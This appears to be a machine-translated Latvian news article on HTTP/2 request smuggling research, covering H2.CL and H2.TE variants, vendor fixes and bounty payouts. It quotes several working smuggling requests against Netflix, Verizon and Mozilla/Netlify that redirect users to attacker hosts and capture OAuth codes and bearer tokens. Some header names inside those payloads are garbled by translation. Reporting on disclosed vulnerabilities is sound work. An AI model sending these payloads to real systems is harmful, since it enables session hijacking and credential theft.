Jauns uzbrukums priekšgala-backend sistēmām, kas ļauj iejaukties pieprasījumos

Tīmekļa sistēmas, kurās priekšgals pieņem savienojumus, izmantojot HTTP/2 un nosūta tos aizmugursistēmai, izmantojot HTTP/1.1, ir pakļautas jaunam “HTTP pieprasījumu kontrabandas” uzbrukuma variantam, kas ļauj, nosūtot īpaši izstrādātus klientu pieprasījumus, iekļūst citu lietotāju pieprasījumu saturā, kas apstrādāti tajā pašā plūsmā starp priekšgalu un aizmugursistēmu. Uzbrukumu var izmantot, lai ievietotu ļaunprātīgu JavaScript kodu sesijā ar likumīgu vietni, apietu piekļuves ierobežojumu sistēmas un pārtvertu autentifikācijas parametrus.

Problēma skar tīmekļa starpniekserverus, slodzes balansētājus, tīmekļa paātrinātājus, satura piegādes sistēmas un citas konfigurācijas, kurās pieprasījumi tiek novirzīti no priekšgala uz aizmuguri. Pētījuma autors demonstrēja iespēju uzbrukt Netflix, Verizon, Bitbucket, Netlify CDN un Atlassian sistēmām un saņēma 56 tūkstošus dolāru atlīdzības programmās par ievainojamību identificēšanu. Problēma ir apstiprināta arī F5 Networks produktos. Problēma daļēji ietekmē mod_proxy Apache http serverī (CVE-2021-33193), ir gaidāms labojums versijā 2.4.49 (izstrādātāji tika informēti par problēmu maija sākumā, un viņiem tika doti 3 mēneši tās novēršanai). Programmā nginx pēdējā laidienā (1.21.1) tika bloķēta iespēja vienlaikus norādīt galvenes “Content-Length” un “Transfer-Encoding”. Uzbrukuma rīki jau ir iekļauti Burp rīku komplektā un ir pieejami paplašinājuma Turbo Intruder veidā.

Jaunās pieprasījumu piesaistīšanas datplūsmā metodes darbības princips ir līdzīgs ievainojamībai, ko tas pats pētnieks atklāja pirms diviem gadiem, taču tas attiecas tikai uz priekšējām ierīcēm, kas pieņem pieprasījumus, izmantojot HTTP/1.1. Atgādināsim, ka frontend-backend shēmā klientu pieprasījumus saņem papildu mezgls - frontend, kas izveido ilgstošu TCP savienojumu ar aizmugursistēmu, kas tieši apstrādā pieprasījumus. Izmantojot šo kopīgo savienojumu, parasti tiek pārsūtīti dažādu lietotāju pieprasījumi, kas seko ķēdei viens pēc otra, atdalīti ar HTTP protokola palīdzību.

Klasiskais “HTTP pieprasījumu kontrabandas” uzbrukums tika balstīts uz faktu, ka priekšgala un aizmugursistēmas interpretē HTTP galvenes “Content-Length” (nosaka kopējo pieprasījumā esošo datu lielumu) un “Transfer-Encoding: chunked” (ļauj pa daļām pārsūtāmie dati) atšķirīgi. Piemēram, ja priekšgals atbalsta tikai "Content-Length", bet ignorē "Transfer-Encoding: chunked", tad uzbrucējs var nosūtīt pieprasījumu, kurā ir gan galvenes "Content-Length", gan "Transfer-Encoding: chunked", taču izmērs ir "Satura garums" neatbilst gabalos sadalītās ķēdes izmēram. Šādā gadījumā priekšgals apstrādās un novirzīs pieprasījumu saskaņā ar “Content-Length”, un aizmugursistēma gaidīs bloka pabeigšanu, pamatojoties uz “Transfer-Encoding: chunked”, un uzbrucēja pieprasījuma atlikušā daļa tiks pabeigta. būt kāda cita pieprasījuma sākumā, kas tiek nosūtīts nākamais.

Atšķirībā no teksta protokola HTTP/1.1, kas tiek parsēts rindas līmenī, HTTP/2 ir binārs protokols un manipulē ar iepriekš noteikta izmēra datu blokiem. Tomēr HTTP/2 izmanto pseidogalvenes, kas atbilst parastajām HTTP galvenēm. Mijiedarbības gadījumā ar aizmugursistēmu, izmantojot protokolu HTTP/1.1, priekšgals pārvērš šīs pseidogalvenes līdzīgās HTTP galvenēs HTTP/1.1. Problēma ir tā, ka aizmugursistēma pieņem lēmumus par straumes parsēšanu, pamatojoties uz priekšgala iestatītajām HTTP galvenēm, bez informācijas par sākotnējā pieprasījuma parametriem.

Jo īpaši vērtības “satura garums” un “pārsūtīšanas kodējums” var pārsūtīt pseidogalvenes veidā, neskatoties uz to, ka tās netiek izmantotas HTTP/2, jo tiek noteikts visu datu lielums. atsevišķā laukā. Tomēr HTTP/2 pieprasījuma pārveidošanas laikā par HTTP/1.1 šīs galvenes tiek pārnestas un var sajaukt aizmugursistēmu. Ir divi galvenie uzbrukuma varianti: H2.TE un H2.CL, kuros aizmugursistēma tiek maldināta ar nepareizu pārsūtīšanas kodējumu vai satura garuma vērtību, kas neatbilst pieprasījuma pamatteksta faktiskajam izmēram, ko priekšgals ir saņēmis, izmantojot HTTP/2 protokols.

H2.CL uzbrukuma piemērs ir norādīt nepareizu izmēru satura garuma pseidogalvenē, nosūtot HTTP/2 pieprasījumu pakalpojumam Netflix. Šis pieprasījums noved pie līdzīgas HTTP galvenes Content-Length pievienošanas, piekļūstot aizmugursistēmai, izmantojot HTTP/1.1, taču, tā kā lielums sadaļā Content-Length ir norādīts mazāks nekā faktiskais, daļa no aizmugures esošajiem datiem tiek apstrādāta kā nākamā pieprasījuma sākumā.

Piemēram, pieprasiet HTTP/2 :method POST :path /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar

Rezultātā uz aizmugursistēmu tiks nosūtīts pieprasījums: POST /n HTTP/1.1 Host: www.netflix.com Content-Length: 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar

Tā kā satura garuma vērtība ir 4, aizmugursistēma pieņems tikai “abcd” kā pieprasījuma pamattekstu, un pārējais “GET /n HTTP/1.1...” tiks apstrādāts kā nākamā pieprasījuma sākums. saistīts ar citu lietotāju. Attiecīgi straume tiks desinhronizēta un, atbildot uz nākamo pieprasījumu, tiks izdots fiktīva pieprasījuma apstrādes rezultāts. Netflix gadījumā, fiktīva pieprasījuma galvenē “Host:” norādot trešās puses resursdatoru, klients atgrieza atbildi “Atrašanās vieta: https://02.rs?x.netflix.com/n” un ļāva klientam nosūtīt patvaļīgu saturu, tostarp palaist JavaScript kodu Netflix vietnes kontekstā.

Otrā uzbrukuma iespēja (H2.TE) ietver galvenes “Transfer-Encoding: chunked” aizstāšanu. Pārsūtīšanas kodēšanas pseidogalvenes izmantošana HTTP/2 ir aizliegta ar specifikāciju, un pieprasījumi ar to tiek uzskatīti par nepareiziem. Neskatoties uz to, daži priekšgala implementācijas neņem vērā šo prasību un ļauj HTTP/2 izmantot pārsūtīšanas kodēšanas pseidogalveni, kas tiek pārveidota par līdzīgu HTTP galveni. Ja ir virsraksts “Transfer-Encoding”, aizmugursistēma var pieņemt to kā augstāku prioritāti un parsēt datus pa gabalam “sadalītā” režīmā, izmantojot dažāda lieluma blokus formātā “{size}\r\n{block }\r\n{izmērs} \r\n{bloks}\r\n0, neskatoties uz sākotnējo sadalījumu pēc kopējā izmēra.

Šādas plaisas esamību pierādīja Verizon piemērs. Problēma attiecās uz autentifikācijas portālu un satura pārvaldības sistēmu, kas tiek izmantota arī tādās vietnēs kā Huffington Post un Engadget. Piemēram, klienta pieprasījums, izmantojot HTTP/2: :method POST :path /identitfy/XUI :authority id.b2b.oath.com transfer-encoding chunked 0 GET /oops HTTP/1.1 Host: psres.net Content-Length: 10 x=

Rezultātā aizmugursistēmai tika nosūtīts HTTP/1.1 pieprasījums: POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com Satura garums: 66 Pārsūtīšanas kodējums: chunked 0 GET /oops HTTP/1.1 Host: psres. neto saturs- garums: 10x=

Savukārt aizmugursistēma ignorēja galveni “Content-Length” un veica plūsmā ievietotu sadalīšanu, pamatojoties uz “Transfer-Encoding: chunked”. Praksē uzbrukums ļāva novirzīt lietotāju pieprasījumus uz viņu vietni, tostarp pārtvert ar OAuth autentifikāciju saistītus pieprasījumus, kuru parametri tika parādīti Referer galvenē, kā arī simulēt autentifikācijas sesiju un aktivizēt lietotāja sistēmu, lai nosūtītu akreditācijas datus. uzbrucēja saimniekam. GET /b2blanding/show/oops HTTP/1.1 Saimniekdators: psres.net Atsaucējs: https://id.b2b.oath.com/?…&code=secret GET / HTTP/1.1 Saimniekdators: psres.net Autorizācija: Nesējs eyJhcGwiOiJIUzI1cCI1IInkR6cCI6

Lai uzbruktu HTTP/2 implementācijām, kas neļauj norādīt pārsūtīšanas kodēšanas pseidogalveni, ir ierosināta cita metode, kas ietver galvenes “Transfer-Encoding” aizstāšanu, pievienojot to citām pseidogalvenēm, kas atdalītas ar jaunas rindiņas rakstzīmi ( konvertējot uz HTTP/1.1, šajā gadījumā tiek izveidotas divas atsevišķas HTTP galvenes).

Piemēram, šī problēma skāra Atlassian Jira un Netlify CDN (izmanto, lai apkalpotu Mozilla sākuma lapu pārlūkprogrammā Firefox). Konkrēti, HTTP/2 pieprasījums :method POST :path / :authority start.mozilla.org foo b\r\n transfer-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Host : evil-netlify-domain\r\n Satura garums: 5\r\n \r\nx=

rezultātā HTTP/1.1 POST / HTTP/1.1 pieprasījums tika nosūtīts uz aizmugursistēmu\r\n Resursdators: start.mozilla.org\r\n Foo: b\r\n Pārsūtīšanas kodējums: chunked\r\n Satura garums : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Saimniekdators: evil-netlify-domain\r\n Satura garums: 5\r\n \r \nx=

Vēl viena iespēja, kā aizstāt galveni “Transfer-Encoding”, bija pievienot to citas pseidogalvenes nosaukumam vai rindai ar pieprasījuma metodi. Piemēram, piekļūstot Atlassian Jira, pseido galvenes nosaukums "foo: bar\r\ntransfer-encoding" ar vērtību "chunked" izraisīja HTTP galvenes "foo: bar" un "transfer-encoding: chunked" pievienošanu. , un norādot pseidogalvenes ":method" vērtību "GET / HTTP/1.1\r\nTransfer-encoding: chunked" tika tulkota kā "GET / HTTP/1.1\r\ntransfer-encoding: chunked".

Pētnieks, kurš identificēja problēmu, arī ierosināja pieprasījuma tunelēšanas paņēmienu, lai uzbruktu priekšgaliem, kurā katra IP adrese izveido atsevišķu savienojumu ar aizmugursistēmu un netiek sajaukta dažādu lietotāju trafika. Piedāvātā tehnika neļauj iejaukties citu lietotāju pieprasījumos, bet ļauj saindēt koplietoto kešatmiņu, kas ietekmē citu pieprasījumu apstrādi, un ļauj aizstāt iekšējās HTTP galvenes, ko izmanto pakalpojuma informācijas pārsūtīšanai no priekšgala uz aizmugursistēmu ( piemēram, veicot autentifikāciju priekšgala pusē, šādas galvenes var pārsūtīt informāciju par pašreizējo lietotāju uz aizmuguri). Kā piemēru metodes pielietošanai praksē, izmantojot kešatmiņas saindēšanu, Bitbucket servisā bija iespējams iegūt kontroli pār lapām.

Avots: opennet.ru